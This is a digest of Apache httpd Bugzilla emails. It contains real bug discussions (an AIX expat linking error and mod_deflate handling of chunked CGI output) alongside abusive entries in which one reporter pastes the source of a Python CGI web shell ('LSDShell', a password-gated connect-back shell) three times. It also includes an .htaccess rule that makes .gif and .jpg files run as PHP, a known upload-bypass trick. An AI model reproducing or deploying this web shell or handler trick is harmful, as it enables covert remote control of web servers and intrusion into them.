[Bug 68995] Apache compile goes through but httpd -V throws error
https://bz.apache.org/bugzilla/show_bug.cgi?id=68995 --- Comment #1 from sakamurivand...@gmail.com --- Works with expat 2.5.0. Issue only with expat 2.6.2 -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 40837] PHP 5.2.0 RC7-DEV, Apache 2.2.3 doesn't start (i know you don't know PHP things but PHP Team didn't help)
https://bz.apache.org/bugzilla/show_bug.cgi?id=40837 flm2r changed: What|Removed |Added Attachment #39711|file_40837.txt |file_40837.html filename|| Attachment #39711|0 |1 is patch|| --- Comment #3 from flm2r --- Comment on attachment 39711 --> https://bz.apache.org/bugzilla/attachment.cgi?id=39711 .html -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 40837] PHP 5.2.0 RC7-DEV, Apache 2.2.3 doesn't start (i know you don't know PHP things but PHP Team didn't help)
https://bz.apache.org/bugzilla/show_bug.cgi?id=40837 --- Comment #2 from flm2r --- Created attachment 39711 --> https://bz.apache.org/bugzilla/attachment.cgi?id=39711=edit .html -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 40837] PHP 5.2.0 RC7-DEV, Apache 2.2.3 doesn't start (i know you don't know PHP things but PHP Team didn't help)
https://bz.apache.org/bugzilla/show_bug.cgi?id=40837 --- Comment #1 from flm2r --- -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 64604] impossible to build a RPM of the mod_session on version 2.4.43
https://bz.apache.org/bugzilla/show_bug.cgi?id=64604 --- Comment #1 from flm2r --- #!/bin/sh # post_upload.htm example: # # # # File to upload: # # POST upload format: # -29995809218093749221856446032^M # Content-Disposition: form-data; name="file1"; filename="..."^M # Content-Type: application/octet-stream^M # ^M<- headers end with empty line # file contents # file contents # file contents # ^M<- extra empty line # -29995809218093749221856446032--^M file=$(mktemp) CR=`printf '\r'` # CGI output must start with at least empty line (or headers) printf '\r\n' IFS="$CR" read -r delim_line IFS="" while read -r line; do test x"$line" = x"" && break test x"$line" = x"$CR" && break done cat >"$file" # We need to delete the tail of "\r\ndelim_line--\r\n" tail_len=$((${#delim_line} + 6)) # Get and check file size filesize=`stat -c"%s" "$file"` test "$filesize" -lt "$tail_len" && exit 1 # Check that tail is correct dd if="$file" skip=$((filesize - tail_len)) bs=1 count=1000 >"$file.tail" 2>/dev/null printf "\r\n%s--\r\n" "$delim_line" >"$file.tail.expected" if ! diff -q "$file.tail" "$file.tail.expected" >/dev/null; then printf "\n\nMalformed file upload" exit 1 fi rm "$file.tail" rm "$file.tail.expected" # Truncate the file dd of="$file" seek=$((filesize - tail_len)) bs=1 count=0 >/dev/null 2>/dev/null printf "\n\nFile upload has been accepted" -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 69005] s.php
https://bz.apache.org/bugzilla/show_bug.cgi?id=69005 flm2r changed: What|Removed |Added Attachment #39709|0 |1 is obsolete|| --- Comment #3 from flm2r --- Created attachment 39710 --> https://bz.apache.org/bugzilla/attachment.cgi?id=39710=edit s.php 39709: -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 69005] s.php
https://bz.apache.org/bugzilla/show_bug.cgi?id=69005 flm2r changed: What|Removed |Added CC||sn50...@gmail.com -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 69005] s.php
https://bz.apache.org/bugzilla/show_bug.cgi?id=69005 --- Comment #2 from flm2r --- Comment on attachment 39709 --> https://bz.apache.org/bugzilla/attachment.cgi?id=39709 -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 69005] s.php
https://bz.apache.org/bugzilla/show_bug.cgi?id=69005 --- Comment #1 from flm2r --- Comment on attachment 39709 --> https://bz.apache.org/bugzilla/attachment.cgi?id=39709 -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 69005] New: s.php
https://bz.apache.org/bugzilla/show_bug.cgi?id=69005 Bug ID: 69005 Summary: s.php Product: Apache httpd-2 Version: 2.5-HEAD Hardware: All OS: All Status: NEW Severity: major Priority: P2 Component: All Assignee: bugs@httpd.apache.org Reporter: sn50...@gmail.com Target Milestone: --- Created attachment 39709 --> https://bz.apache.org/bugzilla/attachment.cgi?id=39709=edit -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 69000]
https://bz.apache.org/bugzilla/show_bug.cgi?id=69000 flm2r changed: What|Removed |Added Attachment #39705|htaccess|.htaccess filename|| -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 69000]
https://bz.apache.org/bugzilla/show_bug.cgi?id=69000 --- Comment #2 from flm2r --- Comment on attachment 39705 --> https://bz.apache.org/bugzilla/attachment.cgi?id=39705 >AddType application/x-httpd-php .gif AddType application/x-httpd-php .jpg -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 69003] s
https://bz.apache.org/bugzilla/show_bug.cgi?id=69003 flm2r changed: What|Removed |Added CC||sn50...@gmail.com --- Comment #2 from flm2r --- Created attachment 39708 --> https://bz.apache.org/bugzilla/attachment.cgi?id=39708=edit -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 69003] s
https://bz.apache.org/bugzilla/show_bug.cgi?id=69003 --- Comment #1 from flm2r --- #!/usr/bin/python import sys, os, cgi, commands, time, Cookie, socket, pty,select from base64 import b64encode from stat import * from datetime import datetime sys.stderr = open(os.devnull, 'w') password = "27db7898211c8ccbeb4d5a97d198839a" # root version = "0.5 [PRIV9]" esc = '%s['%chr(27) color = esc + "1;36m" reset = esc + "0m" # don't ask why i did it this way, ''' doesnt agree with pty's ascii = color ascii +=' @@@ @@@ @@@ @@@ @@@ @@@ @@@ @@@ @@@ @@ @@ @@@ \r\n'# ascii +=' !@@ @@! @@@ @@! @@! @@@ @@! @@@ @@! !@@ @@@ @@! @@! @@!\r\n'# ascii +=' !@! @!@!@!@! !!@ @!@@!@! @!@@!@! !@!@! !@! @!!!: @!!!: @!! \r\n'# ascii +=' :!! !!: !!! !!: !!: !!:!!:!!! !!: !!: .!!: \r\n'# ascii +=' :: :: : : : : ::: .: : ::: :: ::: :: : : \r\n'# ascii +=' ~[ P R I V 8 C O N N E C T B A C K S H E L L ]~ \r\n'# ascii += reset### def getall(theform, nolist = False): data = {} for field in theform.keys(): if type(theform[field]) == type([]): if not nolist: data[field] = theform.getlist(field) else: data[field] = theform.getfirst(field) elif theform[field].filename: _FILES[field] = theform[field] else: data[field] = theform[field].value return data def escape(str): return str.replace("'", "\\'").replace("\r", "\\r").replace("\n", "\\n") _FILES = {} _REQUEST = getall( cgi.FieldStorage() ) if _REQUEST.has_key('charset') == False: _REQUEST['charset'] = "Windows-1251" if _REQUEST.has_key('a') == False: _REQUEST['a'] = "files" if _REQUEST.has_key('c') == False: _REQUEST['c'] = os.getcwd() if _REQUEST.has_key('p1') == False: _REQUEST['p1'] = "" if _REQUEST.has_key('p2') == False: _REQUEST['p2'] = "" if _REQUEST.has_key('p3') == False: _REQUEST['p3'] = "" _COOKIE = Cookie.SimpleCookie() try: _COOKIE.load(os.environ["HTTP_COOKIE"]) except: pass def printLogin(): _COOKIE['psswd'] = ""; print _COOKIE; print "Content-type: text/html\n"; print """ body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color:#00cfcf !important; } span{ font-weight: bolder; } h1{ border-left:5px solid #df5;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:250px; } input,textarea,select{ margin:0;color:#00afaf;background-color:#555;border:1px solid #00afcf; font: 24pt Monospace,"Courier New"; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} pre,.m{font-family:Courier,Monospace;} Password: """ exit() if _COOKIE.has_key('psswd') and len(_COOKIE['psswd'].value) > 0 : if _COOKIE['psswd'].value != password: printLogin() elif _REQUEST.has_key('psswd'): try: import hashlib psswd = hashlib.md5() except: import md5 psswd = md5.new() psswd.update(_REQUEST['psswd']) if psswd.hexdigest() != password: printLogin() else: _COOKIE['psswd'] = psswd.hexdigest() else: printLogin() print _COOKIE home_dir = os.getcwd() try: os.chdir(_REQUEST['c']) except os.error, msg: pass cwd = os.getcwd(); if cwd[-1] != '/': cwd += '/' def printHeader(): print "Content-type: text/html\n"; print "" + os.environ["SERVER_NAME"] + " - LSDShell " + version + """ body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color:#00cfcf !important; } span{ font-weight: bolder; } h1{ border-left:5px solid #df5;padding: 2px 5px;font
[Bug 69003] New: s
https://bz.apache.org/bugzilla/show_bug.cgi?id=69003 Bug ID: 69003 Summary: s Product: Apache httpd-test Version: unspecified Hardware: All OS: Linux Status: NEW Severity: normal Priority: P2 Component: framework Assignee: bugs@httpd.apache.org Reporter: sn50...@gmail.com Target Milestone: --- #!/usr/bin/python import sys, os, cgi, commands, time, Cookie, socket, pty,select from base64 import b64encode from stat import * from datetime import datetime sys.stderr = open(os.devnull, 'w') password = "27db7898211c8ccbeb4d5a97d198839a" # root version = "0.5 [PRIV9]" esc = '%s['%chr(27) color = esc + "1;36m" reset = esc + "0m" # don't ask why i did it this way, ''' doesnt agree with pty's ascii = color ascii +=' @@@ @@@ @@@ @@@ @@@ @@@ @@@ @@@ @@@ @@ @@ @@@ \r\n'# ascii +=' !@@ @@! @@@ @@! @@! @@@ @@! @@@ @@! !@@ @@@ @@! @@! @@!\r\n'# ascii +=' !@! @!@!@!@! !!@ @!@@!@! @!@@!@! !@!@! !@! @!!!: @!!!: @!! \r\n'# ascii +=' :!! !!: !!! !!: !!: !!:!!:!!! !!: !!: .!!: \r\n'# ascii +=' :: :: : : : : ::: .: : ::: :: ::: :: : : \r\n'# ascii +=' ~[ P R I V 8 C O N N E C T B A C K S H E L L ]~ \r\n'# ascii += reset### def getall(theform, nolist = False): data = {} for field in theform.keys(): if type(theform[field]) == type([]): if not nolist: data[field] = theform.getlist(field) else: data[field] = theform.getfirst(field) elif theform[field].filename: _FILES[field] = theform[field] else: data[field] = theform[field].value return data def escape(str): return str.replace("'", "\\'").replace("\r", "\\r").replace("\n", "\\n") _FILES = {} _REQUEST = getall( cgi.FieldStorage() ) if _REQUEST.has_key('charset') == False: _REQUEST['charset'] = "Windows-1251" if _REQUEST.has_key('a') == False: _REQUEST['a'] = "files" if _REQUEST.has_key('c') == False: _REQUEST['c'] = os.getcwd() if _REQUEST.has_key('p1') == False: _REQUEST['p1'] = "" if _REQUEST.has_key('p2') == False: _REQUEST['p2'] = "" if _REQUEST.has_key('p3') == False: _REQUEST['p3'] = "" _COOKIE = Cookie.SimpleCookie() try: _COOKIE.load(os.environ["HTTP_COOKIE"]) except: pass def printLogin(): _COOKIE['psswd'] = ""; print _COOKIE; print "Content-type: text/html\n"; print """ body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color:#00cfcf !important; } span{ font-weight: bolder; } h1{ border-left:5px solid #df5;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:250px; } input,textarea,select{ margin:0;color:#00afaf;background-color:#555;border:1px solid #00afcf; font: 24pt Monospace,"Courier New"; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} pre,.m{font-family:Courier,Monospace;} Password: """ exit() if _COOKIE.has_key('psswd') and len(_COOKIE['psswd'].value) > 0 : if _COOKIE['psswd'].value != password: printLogin() elif _REQUEST.has_key('psswd'): try: import hashlib psswd = hashlib.md5() except: import md5 psswd = md5.new() psswd.update(_REQUEST['psswd']) if psswd.hexdigest() != password: printLogin() else: _COOKIE['psswd'] = psswd.hexdigest() else: printLogin() print _COOKIE home_dir = os.getcwd() try: os.chdir(_REQUEST['c']) except os.error, msg: pass cwd = os.getcwd(); if cwd[-1] != '/': cwd += '/' def printHeader(): print "Content-type: text/html\n"; print "" + os.environ["SERVER_NAME"] + " - LSDShell " + version + """
[Bug 69002] New: s
https://bz.apache.org/bugzilla/show_bug.cgi?id=69002 Bug ID: 69002 Summary: s Product: Apache httpd-test Version: unspecified Hardware: All OS: Linux Status: NEW Severity: normal Priority: P2 Component: framework Assignee: bugs@httpd.apache.org Reporter: sn50...@gmail.com Target Milestone: --- Created attachment 39706 --> https://bz.apache.org/bugzilla/attachment.cgi?id=39706=edit s #!/usr/bin/python import sys, os, cgi, commands, time, Cookie, socket, pty,select from base64 import b64encode from stat import * from datetime import datetime sys.stderr = open(os.devnull, 'w') password = "27db7898211c8ccbeb4d5a97d198839a" # root version = "0.5 [PRIV9]" esc = '%s['%chr(27) color = esc + "1;36m" reset = esc + "0m" # don't ask why i did it this way, ''' doesnt agree with pty's ascii = color ascii +=' @@@ @@@ @@@ @@@ @@@ @@@ @@@ @@@ @@@ @@ @@ @@@ \r\n'# ascii +=' !@@ @@! @@@ @@! @@! @@@ @@! @@@ @@! !@@ @@@ @@! @@! @@!\r\n'# ascii +=' !@! @!@!@!@! !!@ @!@@!@! @!@@!@! !@!@! !@! @!!!: @!!!: @!! \r\n'# ascii +=' :!! !!: !!! !!: !!: !!:!!:!!! !!: !!: .!!: \r\n'# ascii +=' :: :: : : : : ::: .: : ::: :: ::: :: : : \r\n'# ascii +=' ~[ P R I V 8 C O N N E C T B A C K S H E L L ]~ \r\n'# ascii += reset### def getall(theform, nolist = False): data = {} for field in theform.keys(): if type(theform[field]) == type([]): if not nolist: data[field] = theform.getlist(field) else: data[field] = theform.getfirst(field) elif theform[field].filename: _FILES[field] = theform[field] else: data[field] = theform[field].value return data def escape(str): return str.replace("'", "\\'").replace("\r", "\\r").replace("\n", "\\n") _FILES = {} _REQUEST = getall( cgi.FieldStorage() ) if _REQUEST.has_key('charset') == False: _REQUEST['charset'] = "Windows-1251" if _REQUEST.has_key('a') == False: _REQUEST['a'] = "files" if _REQUEST.has_key('c') == False: _REQUEST['c'] = os.getcwd() if _REQUEST.has_key('p1') == False: _REQUEST['p1'] = "" if _REQUEST.has_key('p2') == False: _REQUEST['p2'] = "" if _REQUEST.has_key('p3') == False: _REQUEST['p3'] = "" _COOKIE = Cookie.SimpleCookie() try: _COOKIE.load(os.environ["HTTP_COOKIE"]) except: pass def printLogin(): _COOKIE['psswd'] = ""; print _COOKIE; print "Content-type: text/html\n"; print """ body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color:#00cfcf !important; } span{ font-weight: bolder; } h1{ border-left:5px solid #df5;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:250px; } input,textarea,select{ margin:0;color:#00afaf;background-color:#555;border:1px solid #00afcf; font: 24pt Monospace,"Courier New"; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} pre,.m{font-family:Courier,Monospace;} Password: """ exit() if _COOKIE.has_key('psswd') and len(_COOKIE['psswd'].value) > 0 : if _COOKIE['psswd'].value != password: printLogin() elif _REQUEST.has_key('psswd'): try: import hashlib psswd = hashlib.md5() except: import md5 psswd = md5.new() psswd.update(_REQUEST['psswd']) if psswd.hexdigest() != password: printLogin() else: _COOKIE['psswd'] = psswd.hexdigest() else: printLogin() print _COOKIE home_dir = os.getcwd() try: os.chdir(_REQUEST['c']) except os.error, msg: pass cwd = os.getcwd(); if cwd[-1] != '/': cwd += '/' def printHeader(): print "Content-type: text/html\n"; print "" + os.environ[
[Bug 69000]
https://bz.apache.org/bugzilla/show_bug.cgi?id=69000 flm2r changed: What|Removed |Added CC||sn50...@gmail.com --- Comment #1 from flm2r --- Created attachment 39705 --> https://bz.apache.org/bugzilla/attachment.cgi?id=39705=edit -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 69000] New:
https://bz.apache.org/bugzilla/show_bug.cgi?id=69000 Bug ID: 69000 Summary: Product: Apache httpd-2 Version: 2.5-HEAD Hardware: PC Status: NEW Severity: normal Priority: P2 Component: All Assignee: bugs@httpd.apache.org Reporter: sn50...@gmail.com Target Milestone: --- -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68999] New:
https://bz.apache.org/bugzilla/show_bug.cgi?id=68999 Bug ID: 68999 Summary: Product: Apache httpd-2 Version: 2.5-HEAD Hardware: PC Status: NEW Severity: normal Priority: P2 Component: All Assignee: bugs@httpd.apache.org Reporter: sn50...@gmail.com Target Milestone: --- Created attachment 39703 --> https://bz.apache.org/bugzilla/attachment.cgi?id=39703=edit -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68970] mod_deflate no longer properly handles chunked responses from CGI scripts
https://bz.apache.org/bugzilla/show_bug.cgi?id=68970 --- Comment #22 from Joe Orton --- (In reply to Allan Schrum from comment #20) > So, can you point out how NPH is setup with Apache 2.4? Rename your CGI script to have an nph- prefix. -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68970] mod_deflate no longer properly handles chunked responses from CGI scripts
https://bz.apache.org/bugzilla/show_bug.cgi?id=68970 --- Comment #21 from Joe Orton --- Created attachment 39702 --> https://bz.apache.org/bugzilla/attachment.cgi?id=39702=edit minimal repro case? Minimal CGI repro case copy and pasted from the SOAP output here. Test Configuration: AddOutputFilter DEFLATE .sh 1. Test with Fedora httpd 2.4.56 (I have it to hand) # curl http://localhost/cgi-bin/soap.sh -- works # curl --compressed http://localhost/cgi-bin/soap.sh curl: (56) Illegal or missing hexadecimal sequence in chunked-encoding -- broken because DEFLATE-encoded chunks doesn't work 2. Test with Fedora httpd 2.4.59 # curl http://localhost/cgi-bin/soap.sh -- works but prints raw chunked output # curl -v --compressed http://localhost/cgi-bin/soap.sh -- works but prints raw chunked output -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68970] mod_deflate no longer properly handles chunked responses from CGI scripts
https://bz.apache.org/bugzilla/show_bug.cgi?id=68970 --- Comment #20 from Allan Schrum --- You folks are in a better position to create this minimal configuration than I am. The configuration I have is internal and cannot be released. However, take the basic install, enable mod_deflate and see it fail. Then disable mod_deflate and see it work. Creating a small CGI process that generates chunked output is easy. You can even use the one I provided and simply "cat" it out (after adding the missing headers). Does NPH even work? I've seen a lot of articles indicate that NPH does not work with Apache but they were for older versions. I've looked and only found the mod_asis module but it also indicates that it will insert or correct a Content-Length header which essentially defeats the Transfer-Encoding header. That seems like a bug. https://httpd.apache.org/docs/current/mod/mod_asis.html So, can you point out how NPH is setup with Apache 2.4? And can you comment on the mod_asis module if that is the replacement for NPH? As well as the implied bug it has? -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68970] mod_deflate no longer properly handles chunked responses from CGI scripts
https://bz.apache.org/bugzilla/show_bug.cgi?id=68970 --- Comment #19 from Joe Orton --- > 4. Convert our CGI processes to be NPH I think this is the correct approach. This is an explicit opt-out from httpd interpreting any headers, which is exactly what you want/expect to happen. Because it short-circuits content-level filtering, a filter like DEFLATE will not further transform/corrupt the response. You have you still not demonstrated a minimal reproducer + config which shows a CGI script producing chunked output through a DEFLATE filter without response corruption? IMO rather than double-down on the opt-out, mod_cgi* should fail with 5xx for (non-nph) CGI output which includes Transfer-Encoding because it breaks so many assumptions, e.g. with content-level filters. PoC: https://github.com/apache/httpd/pull/444 -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
Bug report for Apache httpd-2 [2024/05/12]
+---+ | Bugzilla Bug ID | | +-+ | | Status: UNC=Unconfirmed NEW=New ASS=Assigned| | | OPN=ReopenedVER=Verified(Skipped Closed/Resolved) | | | +-+ | | | Severity: BLK=Blocker CRI=Critical REG=Regression MAJ=Major | | | | MIN=Minor NOR=NormalENH=Enhancement TRV=Trivial | | | | +-+ | | | | Date Posted | | | | | +--+ | | | | | Description | | | | | | | |10747|New|Maj|2002-07-12|ftp SIZE command and 'smart' ftp servers results i| |11580|Opn|Enh|2002-08-09|generate Content-Location headers | |12033|Opn|Nor|2002-08-26|Graceful restart immediately result in [warn] long| |13661|Ass|Enh|2002-10-15|Apache cannot not handle dynamic IP reallocation | |14104|Opn|Enh|2002-10-30|not documented: must restart server to load new CR| |16811|Ass|Maj|2003-02-05|mod_autoindex always return webpages in UTF-8.| |17244|Ass|Nor|2003-02-20|./configure --help gives false information regardi| |17497|Opn|Nor|2003-02-27|mod_mime_magic generates incorrect response header| |20036|Ass|Nor|2003-05-19|Trailing Dots stripped from PATH_INFO environment | |21260|Opn|Nor|2003-07-02|CacheMaxExpire directive not enforced ! | |21533|Ass|Cri|2003-07-11|Multiple levels of htacces files can cause mod_aut| |22484|Opn|Maj|2003-08-16|semaphore problem takes httpd down| |22686|Opn|Nor|2003-08-25|ab: apr_poll: The timeout specified has expired (7| |22898|Opn|Nor|2003-09-02|nph scripts with two HTTP header | |23911|Opn|Cri|2003-10-18|CGI processes left defunct/zombie under 2.0.54| |24095|Opn|Cri|2003-10-24|ERROR "Parent: child process exited with status 32| |24437|Opn|Nor|2003-11-05|mod_auth_ldap doubly-escapes backslash (\) charact| |24890|Opn|Nor|2003-11-21|Apache config parser should not be local aware ( g| |25469|Opn|Enh|2003-12-12|create AuthRoot for defining paths to auth files | |25484|Ass|Nor|2003-12-12|Non-service Apache cannot be stopped in WinXP | |26153|Opn|Cri|2004-01-15|Apache cygwin directory traversal vulnerability | |27257|Ass|Enh|2004-02-26|rotatelogs with getopt and setuid | |27715|Ass|Enh|2004-03-16|Client sending misformed Range "bytes = 0-100" ins| |29090|Ass|Enh|2004-05-19|MultiviewsMatch NegotiatedOnly extensions not resp| |29510|Ass|Enh|2004-06-10|ab does not support multiple cookies | |29644|Ver|Nor|2004-06-17|mod_proxy keeps downloading even after the client | |30259|Ass|Enh|2004-07-22|When proxy connects to backend, a DNS lookup is do| |30505|Ass|Enh|2004-08-05|Apache uses 'Error', and not lower level event typ| |31302|Opn|Cri|2004-09-19|suexec doesn't execute commands if they're not in | |31352|Ass|Enh|2004-09-21|RFE, Bind to LDAP server with browser supplier use| |31418|Opn|Nor|2004-09-25|SSLUserName is not usable by other modules| |32328|Opn|Enh|2004-11-19|Make mod_rewrite escaping optional / expose intern| |32750|Ass|Maj|2004-12-17|mod_proxy + Win32DisableAcceptEx = memory leak| |33089|New|Nor|2005-01-13|mod_include: Options +Includes (or IncludesNoExec)| |34519|New|Enh|2005-04-19|Directory index should emit valid XHTML | |35098|Ver|Maj|2005-05-27|Install fails using --prefix | |35154|Opn|Nor|2005-06-01|Support for NID_serialNumber, etc. in SSLUserName | |35652|Opn|Min|2005-07-07|Improve error message: "pcfg_openfile: unable to c| |35768|Opn|Nor|2005-07-17|Missing file logs at far too high of log level| |36676|New|Nor|2005-09-15|time() bug in httpd/os/win32/util_win32.c:wait_for| |36710|Opn|Blk|2005-09-19|CGI output not captured | |37006|Ver|Reg|2005-10-11|"pthread" error when compiling under AIX 5.3 using| |37290|Opn|Min|2005-10-28|DirectoryIndex don't work in scriptaliased directo| |37564|New|Enh|2005-11-19|Suggestion: mod_suexec SuexecUserGroup directive i| |38325|Opn|Nor|2006-01-20|impossible to determine AUTH_TYPE of interpreted r| |38571|New|Enh|2006-02-08|CustomLog directive checked by apachectl configtes| |38995|New|Nor|2006-03-16|httpd tries to communicate with the CGI daemon eve| |39275|Opn|Nor|2006-04-11|slow child_init causes MaxClients warning | |39287|New|Nor|2006-04-12|Incorrect If-Modified-Since validation (due to syn| |39727|Ass|Nor|2006-06-05|Incorrect ETag on gzip:ed content | |39748|New|Enh|2006-06-07|Header and POST support for
[Bug 68995] New: Apache compile goes through but httpd -V throws error
https://bz.apache.org/bugzilla/show_bug.cgi?id=68995 Bug ID: 68995 Summary: Apache compile goes through but httpd -V throws error Product: Apache httpd-2 Version: 2.4.59 Hardware: PC OS: AIX Status: NEW Severity: normal Priority: P2 Component: All Assignee: bugs@httpd.apache.org Reporter: sakamurivand...@gmail.com Target Milestone: --- Compiling Apache 2.4.59 from source with apr-1.7.4, apr-util-1.6.3 and expat 2.6.2 on AIX 7.1 and the configure/make/make install all work fine. But once done, if I run #./httpd -V, I see errors as below # ./httpd -V exec(): 0509-036 Cannot load program ./httpd because of the following errors: rtld: 0712-001 Symbol XML_StopParser was referenced from module /usr/local/etc/httpd/lib/libaprutil-1.so(), but a runtime definition of the symbol was not found. rtld: 0712-001 Symbol XML_ParserCreate was referenced from module /usr/local/etc/httpd/lib/libaprutil-1.so(), but a runtime definition of the symbol was not found. rtld: 0712-001 Symbol XML_SetUserData was referenced from module /usr/local/etc/httpd/lib/libaprutil-1.so(), but a runtime definition of the symbol was not found. rtld: 0712-001 Symbol XML_SetElementHandler was referenced from module /usr/local/etc/httpd/lib/libaprutil-1.so(), but a runtime definition of the symbol was not found. rtld: 0712-001 Symbol XML_SetCharacterDataHandler was referenced from module /usr/local/etc/httpd/lib/libaprutil-1.so(), but a runtime definition of the symbol was not found. rtld: 0712-001 Symbol XML_SetEntityDeclHandler was referenced from module /usr/local/etc/httpd/lib/libaprutil-1.so(), but a runtime definition of the symbol was not found. rtld: 0712-001 Symbol XML_Parse was referenced from module /usr/local/etc/httpd/lib/libaprutil-1.so(), but a runtime definition of the symbol was not found. rtld: 0712-001 Symbol XML_GetErrorCode was referenced from module /usr/local/etc/httpd/lib/libaprutil-1.so(), but a runtime definition of the symbol was not found. rtld: 0712-001 Symbol XML_ErrorString was referenced from module /usr/local/etc/httpd/lib/libaprutil-1.so(), but a runtime definition of the symbol was not found. rtld: 0712-001 Symbol XML_ParserFree was referenced from module /usr/local/etc/httpd/lib/libaprutil-1.so(), but a runtime definition of the symbol was not found. -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68970] mod_deflate no longer properly handles chunked responses from CGI scripts
https://bz.apache.org/bugzilla/show_bug.cgi?id=68970 Eric Covener changed: What|Removed |Added Status|NEEDINFO|NEW --- Comment #18 from Eric Covener --- (In reply to Allan Schrum from comment #17) > You arguments indicate that you believe this should never have worked. Fine, > I accept that. However, it did work for a very long time and it is now > broken. Perhaps this worked because previously the code treated the output > from CGI as a transfer hop so Transfer-Encoding worked as Apache read the > output from the CGI process. It was mentioned that the code change that > "broke" this now clears the transfer encoding variable arbitrarily. Perhaps > it should only be cleared if Content-Length is provided? > > So it seems like the options are: > > 1. Go back to the previous behavior for mod_deflate so that the chunked > output from the CGI script is properly read as part of the activities of > mod_deflate. > 1.a. This might need to be more generic and apply to anything reading the > output of the CGI process, not simply mod_deflate. > 1.b. 